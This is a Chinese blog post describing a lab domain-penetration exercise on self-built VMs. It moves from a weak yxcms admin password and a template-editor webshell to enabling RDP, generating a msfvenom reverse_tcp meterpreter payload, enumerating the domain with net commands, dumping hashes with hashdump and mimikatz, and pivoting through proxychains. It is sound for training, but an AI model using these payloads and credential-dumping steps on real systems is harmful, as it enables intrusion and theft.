环境搭建
![图片[1]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092628.png)
三台虚拟机,拓扑如下:
![图片[2]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926281.png)
![图片[3]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092629.png)
VM1双网卡,第一个桥接一个VMnet2,桥接的作用是模拟将其web服务暴露在外网。攻击机是在桥接网卡的网络中。
VM2、VM3全部是VMnet2,测试后是可以的。
![图片[4]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926291.png)
后面碰到一个问题,DMZ无法与域控通信,相当于整个域与DMZ失去了联系,后面发现要将DMZ的DNS设置成域控AD的IP。
初探DMZ
![图片[5]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926292.png)
可以看到有个yxcms。
![图片[6]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092630.png)
存在弱口令:admin 123456
![图片[7]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092631.jpg)
可以看到一些系统的设置,站点物理路径:C:/phpStudy/WWW
先浏览一下后台,看看有没有能get shell的地方。
看到了执行sql语句,但是在尝试写shell的过程中发现一句话写不进去。
![图片[8]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092631.png)
http://192.168.8.157/yxcms/index.php?r=admin/set/tpadd&Mname=default
目标路径:
http://192.168.8.157/yxcms/protected/apps/default/view/default/config_inc.php
![图片[9]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092632.jpg)
进入内网
关于发现内网主机以及代理的问题,在“浅析内网渗透”一文中有解释:
这里不再赘述,只是演示相关操作。
双网卡,可知内网ip段时192.168.52.x,进行域渗透最好连接3389。
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
用上述命令开启3389端口。
![图片[11]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092633.png)
![图片[12]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926331.png)
注意估计是有密码策略,复杂度够了才能添加成功。
但是3389连接不上,估计是开了防火墙……
可以选择msf的shell关闭防火墙,或者是使用ngrok隧道连接3389。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.116 lport=2333 -f exe > get.exemeterpreter > run post/windows/manage/enable_rdp
![图片[13]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926332.png)
域渗透常用的命令:
ipconfig /all 查询本机IP段,所在域等
net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user 本机用户列表
net localhroup administrators 本机管理员[通常含有域用户]
net user /domain 查询域用户
net user 用户名 /domain 获取指定用户的账户信息
net user /domain b404 pass 修改域内用户密码,需要管理员权限
net group /domain 查询域里面的工作组
net group 组名 /domain 查询域中的某工作组
net group "domain admins" /domain 查询域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台)
net time /domain 判断主域,主域服务器都做时间服务器
简单收集信息后得到:域:god.org 域控:138 域成员:141
可以使用msf的getsystem提权成功
抓hash:hashdump
或者参考上篇内网渗透msf mimikatz抓取明文。(内网渗透 | 手把手教你如何进行内网渗透)
![图片[14]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092634.png)
内网访问还是两个方法:socks代理以及msf添加路由。
内网漫游
这里还是选择了socks代理。
proxychains msfconsole
![图片[15]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926341.png)
![图片[16]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092635.jpg)
445也开着,尝试打一波17_010,2003总是蓝屏遂放弃……
这样已经拿到了另一台域成员的权限了。
proxychains rdesktop 192.168.52.141
![图片[18]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092636.png)
传个shell:
rdesktop -f 192.168.52.141 -u Railgun -p MIE123@u123 -r disk:E=/root/Desktop/
![图片[19]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926361.png)
运行即可。
![图片[20]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092637.jpg)
通过getsystem提权成功。接下来域控。
通过上面mimikatz的使用我们已经知道了域用户的账号密码:Administrator
登陆:GODAdministrator hongri@u123
提权+hash:
![图片[21]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092637.png)
![图片[22]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-1582092638.png)
这样等域控管理员登陆就可以得到域控的密码了。
![图片[23]-内网渗透 | 记录一次简单的域渗透-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-122931-15820926381.png)
这样登陆的全被记录了下来。
写在最后
进行域渗透的最终目标就是拿到域控导出hash或明文密码。
拿到DMZ业务段机器后,开个socks并且反弹个meterpreter的shell回来
-
proxychians来msf或nmap
-
Windows proxifier来渗透内网web
-
meterpreter添加路由
然后就是域成员及域控的渗透,本文没有涉及$IPC入侵,不过应该也挺常用的。
涉及的比较重要的是如何开3389,如何关闭,如何得到域控的密码以及17_010无法反弹shell时怎么办。
拿到域控后提权导密码,结束。
原创投稿作者:Railgun
作者博客:www.pwn4fun.com
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/122931.html
暂无评论内容